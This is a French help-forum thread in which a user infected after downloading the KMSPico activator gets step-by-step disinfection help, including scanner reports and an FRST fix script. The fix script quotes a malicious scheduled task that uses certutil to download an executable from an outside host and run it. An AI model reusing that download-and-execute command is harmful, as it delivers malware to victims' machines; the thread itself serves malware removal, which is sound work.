Plusieurs virus suite à l'installation kmspico

DamienV · par **DamienV** » 07 juin 2018 13:12

Bonjour.

En souhaitant réactiver Office 2016 Plus- et après le téléchargement de KMSPico sur ce site: kmspico10.com !virus!
je me suis retrouvé avec plein de virus qui ont modifiés Windows Defender (je peux pas faire une analyse avec) et rend impossible l'utilisation de l'option: "Reset my PC"

Du coup- j'ai utilisé AdwCleaner qui m'a trouvé une bonne 70 menaces dont certaines a été supprimé et mis en quarantaine
seulement les 6 restants n'ont pas réussit à être supprimer :

***** [ Services ] *****
PUP.Optional.Cloudnet TCPSvc
PUP.Optional.Legacy Windefender

***** [ Folders ] *****
Trojan.Agent C:\Windows\rss

***** [ Files ] *****
Trojan.Agent C:\Windows\windefender.exe

***** [ Tasks ] *****
Adware.CloudWeb C:\Windows\System32\Tasks\ScheduledUpdate

***** [ Registry ] *****
Adware.CloudWeb HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D97E0EE2-5000-456E-B3CA-06B77FEE6D4A}
Adware.CloudWeb HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate

Voici les rapports :
FRST: https://pjjoint.malekal.com/files.php?i ... 4w5p5z8t11
Additions: https://pjjoint.malekal.com/files.php?i ... 8d15h10u10
Shortcut: https://pjjoint.malekal.com/files.php?i ... 14v11y9y12

ZHPCleaner: https://pjjoint.malekal.com/files.php?i ... h11u12g9i6

J'attends vos instructions afin de faire une désinfection s'il vous plait.

Je possède une licence Windows 10 acheté et lié à mon compte Microsoft-
je souhaiterais effectuer une réinstallation vraiment clean et complète en supprimant tous les fichiers/programmes précédents- et surtout en ayant un PC désinfecté de tous les virus. J'ai retenu ma leçon je m'achète une licence Office dès demain ...

Merci de votre aide

DamienV · par **DamienV** » 07 juin 2018 14:06

Rebonjour.

Je ne peux plus éditer le message.
Je met à jour les liens pour FRST/Addition/Shortcut vu que ZHPCleaner à réparer automatiquement (?) se qu'il a trouvé. (je sais pas sur ce point).

FRST: https://pjjoint.malekal.com/files.php?i ... 8h9w9u11k9
Addition: https://pjjoint.malekal.com/files.php?i ... o8i11s5p12
Shortcut: https://pjjoint.malekal.com/files.php?i ... 13d15i5o15

par **Malekal_morte** » 07 juin 2018 14:51

Salut,

Il reste plein de malwares.

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

Code : Tout sélectionner

CreateRestorePoint:
CloseProcesses:
2018-06-07 13:21 - 2018-06-07 13:21 - 000003044 _____ C:\WINDOWS\System32\Tasks\WobUIKhuMtTTi2
2018-06-07 13:21 - 2018-06-07 13:21 - 000000000 ____D C:\WINDOWS\SysWOW64\tieacbz
2018-06-07 13:21 - 2018-06-07 13:21 - 000000000 ____D C:\WINDOWS\system32\tieacbz
2018-06-07 13:21 - 2018-06-07 13:21 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-06-07 13:21 - 2018-06-07 13:21 - 000000000 ____D C:\ProgramData\XjOPTLXDzAynQaVB
2018-06-07 13:21 - 2018-06-07 13:21 - 000000000 ____D C:\ProgramData\55e0cb0e-c21b-4f2d-ac71-2f3455b1b89f
2018-06-07 13:21 - 2018-06-07 13:21 - 000000000 ____D C:\ProgramData\47765288-ac79-4c5b-b2c6-5c276ae6fc9c
2018-06-07 13:20 - 2018-06-07 14:14 - 000003270 _____ C:\WINDOWS\System32\Tasks\csrss
Task: {1818DEC8-703F-472B-90AB-697F05E1FE5A} - System32\Tasks\Sawmenger XP => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Sawmenger XP\Sawmenger XP.dll",elnXHi <==== ATTENTION
Task: {D97E0EE2-5000-456E-B3CA-06B77FEE6D4A} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\vinet\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\vinet\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {24D0C0FF-E1D9-4D47-B323-DA20BB143A72} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe <==== ATTENTION
EmptyTemp:
RemoveProxy:
Reboot:

Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

2)
Termine par un nettoyage Malwarebytes Anti-Malware (MBAM) version gratuite
Evite les analyses et nettoyages réguliers ZHPCleaner, AdwCleaner, pas utile.

DamienV · par **DamienV** » 07 juin 2018 15:23

Bonjour.

J'ai effectué le nettoyage que vous avez écrit.
Voici le fichier Fixlog.txt que vous me demandez https://pjjoint.malekal.com/files.php?i ... 12z12o15l7

Dans mon Windows Defender j'ai le message suivant:
Your virus & thread protect is managed by your organization
en rouge m'empêchant d'utiliser l'antivirus de Windows.

HyperScan 2 menaces : https://pjjoint.malekal.com/files.php?i ... f5g8e12w15
ThreatScan 14 menaces : https://pjjoint.malekal.com/files.php?i ... l15s10h6b7
J'ai mis en quarantaine il me semble... puis
ZHPCleaner 8 menaces : https://pjjoint.malekal.com/files.php?i ... 1t15l11h14

Une fois la désinfection totale et validée- Je souhaiterais faire un fresh install sur mon PC- quand je clique sur Reset my PC rien ne se passe

DamienV · par **DamienV** » 07 juin 2018 15:57

Les 2 scans suivant ont été effectué après avoir 'repair' les 8 menaces de ZHPCleaner et après avoir mis en Quarantaine les 16 autres menaces:

FRST: https://pjjoint.malekal.com/files.php?i ... 14o8b14d13
Addition: https://pjjoint.malekal.com/files.php?i ... 6o13t7t8o9

DamienV · par **DamienV** » 07 juin 2018 16:32

J'ai trouvé comment réactiver Windows Defender et il m'a trouvé 8 menaces..
Je ne sais pas où sont les fichiers txt pour Windows Defender

TrojanDropper:Win32/Kaymundler.C
TrojanDropper:Win32/CoinMiner.CY
Trojan:Win32/Tiggre!rfn
Trojan:Win32/Detrahere.E
Trojan:Win32/Skeeyah.A!rfn
Trojan:Win32/Fuerboss.D!cl
Trojan:Win32/Fuery.B!cl
Trojan:Win32/Fuerboos.C!cl

Dans Allowed threats (j'ai aucun souvenir d'avoir mis qq choses dedans...) et sils sont identiques que les virus ci dessus
idem pour Exclusions où je retrouve justement les même fichiers / dossiers qui m'ont posé problème: et impossible de supprimer des 'exclusions'
le bouton 'remove' est grisé.

par **Malekal_morte** » 07 juin 2018 18:00

Est-ce que Malwarebytes détecte encore des choses ?

DamienV · par **DamienV** » 07 juin 2018 18:07

Malekal_morte a écrit : ↑07 juin 2018 18:00 Est-ce que Malwarebytes détecte encore des choses ?

Oui
Registry Key: 5
Trojan.BitCoinMiner, HKLM\SOFTWARE\SystemaRev, No Action By User, [524], [527865],1.0.5390
Trojan.CoreBot, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\btlr, No Action By User, [4517], [515824],1.0.5390
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\campaign9961, No Action By User, [500], [518478],1.0.5390
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\multitimercampaign84170, No Action By User, [500], [518476],1.0.5390
Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\Speedycar, No Action By User, [500], [518473],1.0.5390

File: 3
Adware.Neoreklami, C:\PROGRAM FILES\MOZILLA FIREFOX\BROWSER\FEATURES\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.XPI, No Action By User, [2166], [482896],1.0.5390
PUP.Optional.SystemTable.Generic, C:\USERS\VINET\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\22BM1U5A.DEFAULT\EXTENSIONS\[email protected], No Action By User, [4638], [509530],1.0.5390
Adware.Linkury.Generic, C:\USERS\VINET\APPDATA\LOCAL\SHAM.DB, No Action By User, [3750], [516191],1.0.5390

J'ai cliqué sur "Quarantine selected" et redémarrer l'ordinateur.

par **Malekal_morte** » 07 juin 2018 18:09

ok des clés dans le registre et des trucs dans le profil Firefox.
Ca revient encore ?

Niveau ordinateur, il se comporte comment ?

EDIT : ok vu l'autre sujet.

DamienV · par **DamienV** » 07 juin 2018 18:19

Oui ça revient.

Alors j'ai eu Windows Defender et Malwarebytes qui se sont désactivé pour la 3e fois déjà. OFF et le 'TurnON' ne fonctionne pas.
J'ai l'impression que les virus reviennent et (je sais pas) se mettent en 'exclusions' peut être du coup ça ne les détecte pas ou les supprime pas.

Windows Defender s'est désactivé "Your virus & threat protection are manage by your organzation" j'avais réussi à le réactiver grâce à votre fichier regedit: activer_windows_defender.reg

Je ne peux pas relancer Malwarebytes correctement après le redémarrage de l'ordi j'ai "Unable to connect to the Service" et je ne possède pas "Malwarebytes Service" dans services.msc

https://www.malekal.com/impossible-acti ... he_service et les autres options non plus.

Le démarrage est très long je reste longtemps (1min peut être) sur le logo de ma carte mère.

par **Malekal_morte** » 07 juin 2018 19:53

Je pense qu'il faut désinfecter et réinstaler MBAM.
Après réinstaller Windows 10 est effectivement une solution.

DamienV · par **DamienV** » 07 juin 2018 19:56

Oui je vais opter pour cette solution
en tout cas je vais pas refaire la même erreur. :(

Malekal.com forum

Plusieurs virus suite à l'installation kmspico

Plusieurs virus suite à l'installation kmspico

Re: Plusieurs virus suite à l'installation kmspico

Re: Plusieurs virus suite à l'installation kmspico

Re: Plusieurs virus suite à l'installation kmspico

Re: Plusieurs virus suite à l'installation kmspico

Re: Plusieurs virus suite à l'installation kmspico

Re: Plusieurs virus suite à l'installation kmspico

Re: Plusieurs virus suite à l'installation kmspico

Re: Plusieurs virus suite à l'installation kmspico

Re: Plusieurs virus suite à l'installation kmspico

Re: Plusieurs virus suite à l'installation kmspico

Re: Plusieurs virus suite à l'installation kmspico